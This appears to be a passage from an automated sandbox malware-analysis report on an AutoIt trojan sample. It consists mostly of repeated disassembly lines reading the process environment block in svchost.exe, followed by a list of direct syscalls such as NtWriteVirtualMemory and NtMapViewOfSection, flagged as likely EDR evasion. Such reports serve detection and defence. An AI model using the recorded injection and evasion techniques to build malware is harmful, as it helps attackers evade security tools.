            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h]2_2_03C68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h]2_2_03C2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C427 mov eax, dword ptr fs:[00000030h]2_2_03C2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h]2_2_03CB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A430 mov eax, dword ptr fs:[00000030h]2_2_03C6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h]2_2_03C50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h]2_2_03C30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]2_2_03CDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h]2_2_03C38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EBFC mov eax, dword ptr fs:[00000030h]2_2_03C5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]2_2_03CBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h]2_2_03C40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h]2_2_03C40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03CE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03CE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h]2_2_03CE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h]2_2_03CE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]2_2_03D02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]2_2_03D02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]2_2_03D02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h]2_2_03D02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h]2_2_03CC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h]2_2_03CC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFAB40 mov eax, dword ptr fs:[00000030h]2_2_03CFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD8B42 mov eax, dword ptr fs:[00000030h]2_2_03CD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28B50 mov eax, dword ptr fs:[00000030h]2_2_03C28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDEB50 mov eax, dword ptr fs:[00000030h]2_2_03CDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2CB7E mov eax, dword ptr fs:[00000030h]2_2_03C2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04B00 mov eax, dword ptr fs:[00000030h]2_2_03D04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h]2_2_03CAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h]2_2_03C5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h]2_2_03C5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h]2_2_03CF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h]2_2_03CF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]2_2_03C86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]2_2_03C86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h]2_2_03C86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30AD0 mov eax, dword ptr fs:[00000030h]2_2_03C30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h]2_2_03C64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h]2_2_03C64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h]2_2_03C6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h]2_2_03C6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h]2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04A80 mov eax, dword ptr fs:[00000030h]2_2_03D04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C68A90 mov edx, dword ptr fs:[00000030h]2_2_03C68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h]2_2_03C38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h]2_2_03C38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C86AA4 mov eax, dword ptr fs:[00000030h]2_2_03C86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h]2_2_03C40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h]2_2_03C40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]2_2_03C6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]2_2_03C6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]2_2_03C6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDEA60 mov eax, dword ptr fs:[00000030h]2_2_03CDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h]2_2_03CACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h]2_2_03CACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBCA11 mov eax, dword ptr fs:[00000030h]2_2_03CBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA24 mov eax, dword ptr fs:[00000030h]2_2_03C6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EA2E mov eax, dword ptr fs:[00000030h]2_2_03C5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h]2_2_03C54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h]2_2_03C54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA38 mov eax, dword ptr fs:[00000030h]2_2_03C6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC69C0 mov eax, dword ptr fs:[00000030h]2_2_03CC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C649D0 mov eax, dword ptr fs:[00000030h]2_2_03C649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03CFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]2_2_03CBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h]2_2_03C629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h]2_2_03C629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h]2_2_03C309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h]2_2_03C309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB89B3 mov esi, dword ptr fs:[00000030h]2_2_03CB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h]2_2_03CB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h]2_2_03CB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0946 mov eax, dword ptr fs:[00000030h]2_2_03CB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D04940 mov eax, dword ptr fs:[00000030h]2_2_03D04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]2_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]2_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]2_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h]2_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E mov edx, dword ptr fs:[00000030h]2_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h]2_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h]2_2_03CD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h]2_2_03CD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC97C mov eax, dword ptr fs:[00000030h]2_2_03CBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h]2_2_03CAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h]2_2_03CAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC912 mov eax, dword ptr fs:[00000030h]2_2_03CBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h]2_2_03C28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h]2_2_03C28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB892A mov eax, dword ptr fs:[00000030h]2_2_03CB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC892B mov eax, dword ptr fs:[00000030h]2_2_03CC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03C5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D008C0 mov eax, dword ptr fs:[00000030h]2_2_03D008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03CFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03C6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03C6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30887 mov eax, dword ptr fs:[00000030h]2_2_03C30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC89D mov eax, dword ptr fs:[00000030h]2_2_03CBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C42840 mov ecx, dword ptr fs:[00000030h]2_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60854 mov eax, dword ptr fs:[00000030h]2_2_03C60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h]2_2_03C34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h]2_2_03C34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE872 mov eax, dword ptr fs:[00000030h]2_2_03CBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE872 mov eax, dword ptr fs:[00000030h]2_2_03CBE872
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007A81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_007A81F7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0077A364 SetUnhandledExceptionFilter,0_2_0077A364
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_0077A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0077A395

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
